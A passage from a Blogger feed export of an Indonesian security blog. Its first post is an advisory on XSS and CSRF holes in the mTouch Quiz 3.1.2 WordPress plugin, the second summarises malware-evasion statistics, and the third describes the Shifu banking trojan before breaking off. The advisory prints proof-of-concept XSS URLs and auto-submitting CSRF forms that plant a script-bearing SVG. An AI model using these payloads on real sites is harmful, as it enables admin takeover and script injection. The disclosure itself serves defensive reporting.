src\u003d\"http://1.bp.blogspot.com/-ASm2oVbP1x8/VnmrKuSdEiI/AAAAAAAAAqQ/_DbBLHh4VVs/s640/mtouch-quiz-xss-1024x451.jpg\" title\u003d\"Celah XSS Pada Plugins mTouch Wordpress\" width\u003d\"640\" /\u003e\u003c/a\u003e\u003c/div\u003e\u003cbr /\u003e\u003cb\u003ePlugins Review:\u003c/b\u003e\u003cbr /\u003ePlugin link: \u003ca href\u003d\"https://wordpress.org/plugins/mtouch-quiz/\" target\u003d\"_blank\"\u003ehttps://wordpress.org/plugins/mtouch-quiz/\u003c/a\u003e\u003cbr /\u003eActive Installs: 5,000+\u003cbr /\u003eVersion tested: 3.1.2\u003cbr /\u003eCVE Reference: Waiting\u003cbr /\u003e\u003cbr /\u003e\u003cb\u003e1.\u0026nbsp;#1 Reflected XSS on Quiz Manage\u003c/b\u003e\u003cbr /\u003ePada bagian parameter \"quiz\" itu cookie tidak di bersihkan sehingga memungkinkan hacker untuk memanipulasi URL dengan beberapa Query.\u003cbr /\u003e\u003cblockquote class\u003d\"tr_bq\"\u003e\u003cb\u003e\u003ci\u003eProof-of-concept:\u0026nbsp;/wp-admin/edit.php?page\u003dmtouch-quiz%2Fquiz_form.php\u0026amp;quiz\u003d1\"\u0026gt;\u0026lt;h1\u0026gt;XSS\u0026lt;/h1\u0026gt;\u0026amp;action\u003dedit\u003c/i\u003e\u003c/b\u003e\u003c/blockquote\u003e\u003cdiv\u003eLihatlah pada akhir halaman, dimana anda menemukan injeksi HTML.\u003c/div\u003e\u003cblockquote class\u003d\"tr_bq\"\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"quiz\" value\u003d\"1\\\"\u0026gt;\u0026lt;h1\u0026gt;XSS\u0026lt;/h1\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003c/blockquote\u003e\u003cdiv\u003e\u003cb\u003e\u003ci\u003e\u003cbr /\u003e\u003c/i\u003e\u003c/b\u003e\u003c/div\u003e\u003cdiv\u003e\u003cb\u003e2.\u0026nbsp;CSRF on General Options\u003c/b\u003e\u003c/div\u003e\u003cdiv\u003e\u003cdiv\u003ePada Plugin Pilihan umum tidak memiliki token keamanan (seperti wp_nonce) untuk mencegah serangan CSRF.\u003c/div\u003e\u003cdiv\u003eKita ambil contoh:\u0026nbsp;\u003c/div\u003e\u003c/div\u003e\u003cdiv\u003e\u003cblockquote class\u003d\"tr_bq\"\u003e\u003cb\u003e\u003ci\u003e\u0026lt;form action\u003d\"https://victims_website/wp-admin/options-general.php?page\u003dmtouchquiz\" name\u003d\"dsopas\" method\u003d\"POST\"\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"mtq_hidden\" value\u003d\"Y\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"left_delimiter\" value\u003d\"\\(\\displaystyle{\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"right_delimiter\" value\u003d\"}\\)\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"showalerts\" value\u003d\"1\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"show_support\" value\u003d\"1\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;/form\u0026gt; \u0026lt;script\u0026gt; document.dsopas.submit(); \u0026lt;/script\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003c/blockquote\u003eJika admin Mengkonfirmasi mengunjungi halaman ini dengan kode HTML ini pengaturan nya akan berubah.\u003cbr /\u003e\u003cbr /\u003e\u003cb\u003e3.\u0026nbsp;Add a question using CSRF and get a persistent XSS.\u003c/b\u003e\u003cbr /\u003eIni adalah masalah penting. Jika admin mengkonfirmasi mengunjungi halaman dengan HTML ini, ia akan menambahkan pertanyaan dengan vektor XSS (di saya bukti-konsep dapat mendorong teks).\u003cbr /\u003e\u003cbr /\u003eJika Seorang pengguna yang jahat bisa menggunakan celah ini untuk menyebarkan malware, mengambil alih akun admin, dll ...\u003cbr /\u003e\u003cblockquote class\u003d\"tr_bq\"\u003e\u003cb\u003e\u003ci\u003e\u0026lt;form action\u003d\"https://victims_website/wp-admin/edit.php?page\u003dmtouch-quiz/question.php\u0026amp;quiz\u003d1\" name\u003d\"dsopas\" method\u003d\"POST\"\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"content\" value\u003d'\u0026lt;embed src\u003d\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0PnByb21wdCgiWFNTIik7PC9zY3JpcHQ+PC9zdmc+\" type\u003d\"image/svg+xml\" width\u003d\"300\" height\u003d\"150\"\u0026gt;\u0026lt;/embed\u0026gt;' /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"correct_answer[]\" value\u003d\"1\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"answer[]\" value\u003d\"test1\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"hint[]\" value\u003d\"hint1\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"enclose_latex[]\" value\u003d\"2\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"answer[]\" value\u003d\"test2\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"enclose_latex[]\" value\u003d\"2\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"hint[]\" value\u003d\"hint2\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"answer[]\" value\u003d\"\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"hint[]\" value\u003d\"\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"answer[]\" value\u003d\"\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"hint[]\" value\u003d\"\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"answer[]\" value\u003d\"\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"hint[]\" value\u003d\"\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"explanation\" value\u003d\"\u0026lt;h1\u0026gt;xss\u0026lt;/h1\u0026gt;\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"point_value\" value\u003d\"100\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"quiz\" value\u003d\"1\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"question\" value\u003d\"\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"user_ID\" value\u003d\"1\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"action\" value\u003d\"new\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"submit\" value\u003d\"Save\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;/form\u0026gt; \u0026lt;script\u0026gt; document.dsopas.submit(); \u0026lt;/script\u0026gt;\u0026lt;form action\u003d\"https://victims_website/wp-admin/edit.php?page\u003dmtouch-quiz/question.php\u0026amp;quiz\u003d1\" name\u003d\"dsopas\" method\u003d\"POST\"\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"content\" value\u003d'\u0026lt;embed src\u003d\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0PnByb21wdCgiWFNTIik7PC9zY3JpcHQ+PC9zdmc+\" type\u003d\"image/svg+xml\" width\u003d\"300\" height\u003d\"150\"\u0026gt;\u0026lt;/embed\u0026gt;' /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"correct_answer[]\" value\u003d\"1\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"answer[]\" value\u003d\"test1\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"hint[]\" value\u003d\"hint1\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"enclose_latex[]\" value\u003d\"2\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"answer[]\" value\u003d\"test2\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"enclose_latex[]\" value\u003d\"2\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"hint[]\" value\u003d\"hint2\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"answer[]\" value\u003d\"\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"hint[]\" value\u003d\"\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"answer[]\" value\u003d\"\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"hint[]\" value\u003d\"\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"answer[]\" value\u003d\"\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"hint[]\" value\u003d\"\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"explanation\" value\u003d\"\u0026lt;h1\u0026gt;xss\u0026lt;/h1\u0026gt;\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"point_value\" value\u003d\"100\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"quiz\" value\u003d\"1\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"question\" value\u003d\"\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"user_ID\" value\u003d\"1\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"action\" value\u003d\"new\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;input type\u003d\"hidden\" name\u003d\"submit\" value\u003d\"Save\" /\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003cb\u003e\u003ci\u003e\u0026lt;/form\u0026gt; \u0026lt;script\u0026gt; document.dsopas.submit(); \u0026lt;/script\u0026gt;\u003c/i\u003e\u003c/b\u003e\u003c/blockquote\u003e\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: center;\"\u003e\u003ca href\u003d\"https://www.davidsopas.com/wp-content/uploads/2015/12/mtouch-quiz-xss2.jpg\" imageanchor\u003d\"1\" style\u003d\"margin-left: 1em; margin-right: 1em;\"\u003e\u003cimg alt\u003d\"mTouch XSS Vuln\" border\u003d\"0\" height\u003d\"196\" src\u003d\"https://www.davidsopas.com/wp-content/uploads/2015/12/mtouch-quiz-xss2.jpg\" title\u003d\"XSS Example Wordpress\" width\u003d\"640\" /\u003e\u003c/a\u003e\u003c/div\u003e\u003cbr /\u003e\u003cb\u003e4.\u0026nbsp;Quiz Name XSS\u003c/b\u003e\u003cbr /\u003eIni adalah masalah kecil tetapi jika tingkat pengguna lain memiliki akses ke sini, ia bisa mengubah nama kuis untuk vektor XSS dan mendapatkan XSS ke tingkat yang lebih.\u003cbr /\u003e\u003cbr /\u003eSolusi:\u003cbr /\u003e\u003cbr /\u003eVendor telah meluncurkan versi patch - 3.1.3. Juga dia cukup untuk menempatkan hal ini di dalam \u003ca href\u003d\"https://wordpress.org/plugins/mtouch-quiz/changelog/\" target\u003d\"_blank\"\u003echangelog\u003c/a\u003e.\u003cbr /\u003e\u003cbr /\u003eNah, Apakah Anda memakai plugins tersebut ?.\u003cbr /\u003eTetap lah Waspada atas keamanan website anda. Jadi kan Website sebagai Aset penting anda dalam mengelola penghasilan anda.\u003cbr /\u003e\u003cbr /\u003eReferensi:\u0026nbsp;https://wpvulndb.com/vulnerabilities/8355\u003cbr /\u003e\u003cbr /\u003e\u003cb\u003eBungker.co.id - Website Security Team\u003c/b\u003e\u003c/div\u003e\u003cdiv class\u003d\"blogger-post-footer\"\u003ehttp://feeds.feedburner.com/co/mFdp\u003c/div\u003e"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https://www.bungker.co.id/feeds/8902529214724515730/comments/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https://www.bungker.co.id/2015/12/perhatikan-beberapa-celah-di-plugin.html#comment-form","title":"4 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/8902529214724515730"},{"rel":"self","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/8902529214724515730"},{"rel":"alternate","type":"text/html","href":"https://www.bungker.co.id/2015/12/perhatikan-beberapa-celah-di-plugin.html","title":"Perhatikan Beberapa Celah di Plugin mTouch Quiz v3.1.2 WordPress!"}],"author":[{"name":{"$t":"Bungker Corp"},"uri":{"$t":"https://www.blogger.com/profile/14576039512366647631"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"35","height":"35","src":"//www.blogger.com/img/blogger_logo_round_35.png"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://1.bp.blogspot.com/-ASm2oVbP1x8/VnmrKuSdEiI/AAAAAAAAAqQ/_DbBLHh4VVs/s72-c/mtouch-quiz-xss-1024x451.jpg","height":"72","width":"72"},"thr$total":{"$t":"4"}},{"id":{"$t":"tag:blogger.com,1999:blog-4562681011204589043.post-2201682509896179594"},"published":{"$t":"2015-12-23T03:05:00.000+07:00"},"updated":{"$t":"2016-01-16T18:47:59.574+07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"vulnerabilities"},{"scheme":"http://www.blogger.com/atom/ns#","term":"malware"}],"title":{"type":"text","$t":"Statistik Malware Analisis"},"content":{"type":"html","$t":"\u003cdiv style\u003d\"text-align: justify;\"\u003eSelama bulan terakhir ini saya telah mendedikasikan sebagian waktu luang saya dalam membangun pipa analisis statis Malware. Tujuan dari pekerjaan ini adalah untuk memberikan statistik analists Malware berguna pada apa penggelapan teknik Malware saat ini menerapkan. Jika Anda tertarik pada teknik penghindaran Malware silakan lihat posting saya sebelumnya pada topik (di sini). Sebagai pembaca saya tahu salah satu topik favorit saya Cyber Security adalah Malware dan penciptaan thier, jika Anda baru tentang hal itu, saya sarankan Anda untuk melihat ke bawah \"posting blog\":\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u003c/div\u003e\u003cul style\u003d\"text-align: justify;\"\u003e\u003cli\u003e\u003ca href\u003d\"http://marcoramilli.blogspot.it/2014/05/say-hello-to-malcontrol-malware-control.html\" target\u003d\"_blank\"\u003eMalControl\u003c/a\u003e (Malware Control Map).\u003c/li\u003e\u003cli\u003e\u003ca href\u003d\"http://dblp.uni-trier.de/pers/hd/r/Ramilli:Marco\" target\u003d\"_blank\"\u003eDBPL\u003c/a\u003e on Malware.\u003c/li\u003e\u003cli\u003e\u003ca href\u003d\"http://marcoramilli.blogspot.it/2014/04/malware-writers.html\" target\u003d\"_blank\"\u003eRandom\u003c/a\u003e post on Malware.\u003c/li\u003e\u003cli\u003e\u003ca href\u003d\"http://marcoramilli.blogspot.it/2013/07/malware-evasion-chart.html\" target\u003d\"_blank\"\u003eMalware evasion chart\u003c/a\u003e.\u003c/li\u003e\u003c/ul\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u0026nbsp;Gambar berikut menunjukkan MalwareStats.org sebagai muncul jaman sekarang ini. Selain \"romantis aljabar jumlah\" (dari sampel yang dianalisis), jumlah xor dienkripsi deteksi, yang berbahaya DLL menemukan lebih dari jumlah total deteksi dan ukuran file rata-rata, lebih grafik menunjukkan tahu lebih \"teknik penghindaran\" diwakili.\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u003cbr /\u003e\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: center;\"\u003e\u003ca href\u003d\"http://2.bp.blogspot.com/-mrj7vHaePNo/VnmsHtbD9MI/AAAAAAAAAgY/WTcTxBV8uCE/s1600/Screen%2BShot%2B2015-06-16%2Bat%2B12.46.13.png\" imageanchor\u003d\"1\" style\u003d\"margin-left: 1em; margin-right: 1em;\"\u003e\u003cimg border\u003d\"0\" height\u003d\"164\" src\u003d\"http://2.bp.blogspot.com/-mrj7vHaePNo/VnmsHtbD9MI/AAAAAAAAAgY/WTcTxBV8uCE/s320/Screen%2BShot%2B2015-06-16%2Bat%2B12.46.13.png\" width\u003d\"320\" /\u003e\u003c/a\u003e\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u003cbr /\u003e\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003eSalah satu informasi yang paling menarik yang saya ingin memberikan adalah tentang menggunakan teknik mengelak untuk mendeteksi lingkungan virtual sampel mungkin dalam. Informasi ini telah dikumpulkan dan terwakili dalam \"Evasion Teknik Digunakan\" grafik.\u003cbr /\u003e\u003cbr /\u003eSebagai hari ini (silahkan lihat \"posting blog\" tanggal) Virtual teknik penggelapan Lingkungan paling umum adalah VMCheck.dll (Red Pill) diikuti oleh QEMU CPUID Trick dan VirtualBox Detection.\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u0026nbsp;\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u0026nbsp;\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: center;\"\u003e\u003ca href\u003d\"http://4.bp.blogspot.com/-HNu7wj7XCSQ/Vnmsfm_XZYI/AAAAAAAAAgg/nEDb_R394ro/s1600/Screen%2BShot%2B2015-06-21%2Bat%2B22.35.57.png\" imageanchor\u003d\"1\" style\u003d\"margin-left: 1em; margin-right: 1em;\"\u003e\u003cimg border\u003d\"0\" height\u003d\"117\" src\u003d\"http://4.bp.blogspot.com/-HNu7wj7XCSQ/Vnmsfm_XZYI/AAAAAAAAAgg/nEDb_R394ro/s320/Screen%2BShot%2B2015-06-21%2Bat%2B22.35.57.png\" width\u003d\"320\" /\u003e\u003c/a\u003e\u003c/div\u003e\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u0026nbsp;\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u0026nbsp;Informasi yang paling penting kedua yang diberikan adalah tentang Packers. Whate ater packer yang paling sering digunakan Malware mengimplementasikan untuk menghindari deteksi tanda tangan? Berikut pie chart menunjukkan mewakili pengepakan yang paling sering digunakan antara lain.\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u0026nbsp;\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: center;\"\u003e\u003ca href\u003d\"http://1.bp.blogspot.com/-fM0JV4z9aGU/Vnmsq1JhSlI/AAAAAAAAAgo/iD6TlUjauvQ/s1600/Screen%2BShot%2B2015-06-22%2Bat%2B07.41.57.png\" imageanchor\u003d\"1\" style\u003d\"margin-left: 1em; margin-right: 1em;\"\u003e\u003cimg border\u003d\"0\" height\u003d\"206\" src\u003d\"http://1.bp.blogspot.com/-fM0JV4z9aGU/Vnmsq1JhSlI/AAAAAAAAAgo/iD6TlUjauvQ/s320/Screen%2BShot%2B2015-06-22%2Bat%2B07.41.57.png\" width\u003d\"320\" /\u003e\u003c/a\u003e\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u0026nbsp;\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u0026nbsp;Analis aktif (dan IDA Pro) akan setuju dengan saya ketika saya mengatakan bahwa salah satu yang paling memakan waktu avtivity adalah untuk debug sampel yang diberikan. Mencari tahu apa yang paling banyak digunakan teknik Anti-Debugging, bisa menghemat waktu terutama ketika analis di awal analisisnya. Grafik berikut menunjukkan statistik saya di 21k malware (malware dikonfirmasi dan bukan hanya sampel).\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u0026nbsp;\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: center;\"\u003e\u003ca href\u003d\"http://2.bp.blogspot.com/-_XelVJ4mQtE/Vnmszyw0PVI/AAAAAAAAAgw/eQ-KkaaBPnY/s1600/Screen%2BShot%2B2015-06-22%2Bat%2B07.49.29.png\" imageanchor\u003d\"1\" style\u003d\"margin-left: 1em; margin-right: 1em;\"\u003e\u003cimg border\u003d\"0\" height\u003d\"69\" src\u003d\"http://2.bp.blogspot.com/-_XelVJ4mQtE/Vnmszyw0PVI/AAAAAAAAAgw/eQ-KkaaBPnY/s320/Screen%2BShot%2B2015-06-22%2Bat%2B07.49.29.png\" width\u003d\"320\" /\u003e\u003c/a\u003e\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u0026nbsp;\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u0026nbsp;Statistik lebih akan tersedia di situs web: www.malwarestats.org, silakan lihat!\u003cbr /\u003e\u003cbr /\u003eCara Berkontribusi:\u003cbr /\u003eHari demi hari saya akan menambahkan lebih banyak dan lebih banyak sampel tetapi sebenarnya pipa mendorong tidak tersedia secara online dan tidak tersedia untuk submiting gratis. Jika Anda ingin memberikan kontribusi (dan silakan lakukan!) Anda harus berbagi dengan saya malware Anda (GoogleDrive, DropBox, MegaTransfer, dll ... mungkin membantu proses berbagi) aku akan menambahkannya ke pipa mengimpor sederhana saya dan saya akan menempatkan nama Anda pada halaman kontributor.\u003cbr /\u003eData yang di-host secara gratis di keen.io yang diterima untuk mendapatkan saya lisensi gratis untuk proyek itu.\u003cbr /\u003e\u003cbr /\u003eTerima kasih Keen.io!\u003c/div\u003e\u003cdiv class\u003d\"blogger-post-footer\"\u003ehttp://feeds.feedburner.com/co/mFdp\u003c/div\u003e"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https://www.bungker.co.id/feeds/2201682509896179594/comments/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https://www.bungker.co.id/2015/12/statistik-malware-analisis.html#comment-form","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/2201682509896179594"},{"rel":"self","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/2201682509896179594"},{"rel":"alternate","type":"text/html","href":"https://www.bungker.co.id/2015/12/statistik-malware-analisis.html","title":"Statistik Malware Analisis"}],"author":[{"name":{"$t":"Bungker Corp"},"uri":{"$t":"https://www.blogger.com/profile/14576039512366647631"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"35","height":"35","src":"//www.blogger.com/img/blogger_logo_round_35.png"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://2.bp.blogspot.com/-mrj7vHaePNo/VnmsHtbD9MI/AAAAAAAAAgY/WTcTxBV8uCE/s72-c/Screen%2BShot%2B2015-06-16%2Bat%2B12.46.13.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-4562681011204589043.post-1588396767333426914"},"published":{"$t":"2015-12-23T02:58:00.000+07:00"},"updated":{"$t":"2016-01-16T18:47:59.590+07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"vulnerabilities"}],"title":{"type":"text","$t":"new interesting Banking Trojan"},"content":{"type":"html","$t":"\u003cdiv style\u003d\"text-align: justify;\"\u003e\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: center;\"\u003e\u003ca href\u003d\"http://1.bp.blogspot.com/-lqXdlsqtj0k/VnmrRd_EHeI/AAAAAAAAAgQ/cLAgb3zdWng/s1600/Screen%2BShot%2B2015-09-02%2Bat%2B20.27.16.png\" imageanchor\u003d\"1\" style\u003d\"margin-left: 1em; margin-right: 1em;\"\u003e\u003cimg border\u003d\"0\" src\u003d\"http://1.bp.blogspot.com/-lqXdlsqtj0k/VnmrRd_EHeI/AAAAAAAAAgQ/cLAgb3zdWng/s1600/Screen%2BShot%2B2015-09-02%2Bat%2B20.27.16.png\" /\u003e\u003c/a\u003e\u003c/div\u003eHello everybody, today I'd like to share some infos on \"Shifu\" a new  incredibly interesting banking trojan. At this point you might think:\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003e\u003cblockquote class\u003d\"tr_bq\"\u003e\"Why are you writing about Shifu among many other new threats (even more discussed)\u0026nbsp; out there ? \"\u003c/blockquote\u003e\u003c/div\u003e\u003cdiv style\u003d\"text-align: justify;\"\u003eWell... Shifu is a new banking trojan which actually attacks Japanese banks mostly,\u0026nbsp; it's actually well geo-localized and \u003cu\u003eprobably\u003c/u\u003e it will end up on a specific amount of organizations, but what  fascinates me is the way it implements many features by copying what  have done so far some of the \"best in class\" known Malware. Shifu  implements the following features:\u003c/div\u003e\u003cul style\u003d\"text-align: justify;\"\u003e\u003cli\u003e\u003cb\u003eDomain Generation Algorithm (DGA)\u003c/b\u003e: Shifu uses the Shiz  Trojan’s DGA. The exposed algorithm itself is easy to find online, and  the developers behind Shifu have elected to use it for the generation of  random domain names for covert botnet communications.\u0026nbsp;\u003c/li\u003e\u003cli\u003e\u003cb\u003eTheft From Bank Apps\u003c/b\u003e: Theft of passwords, authentication  token files, user certificate keys and sensitive data from Java applets  is one of Shifu’s principal mechanisms. This type of modus operandi is  familiar from Corcow’s and Shiz’s codes. Both Trojans used these  mechanisms to target the banking applications of Russia- and  Ukraine-based banks. Shifu, too, targets Russian banks as part of its  target list in addition to Japanese banks.\u003c/li\u003e\u003cli\u003e\u0026nbsp;\u003cb\u003eAnti-Sec\u003c/b\u003e: Shifu’s 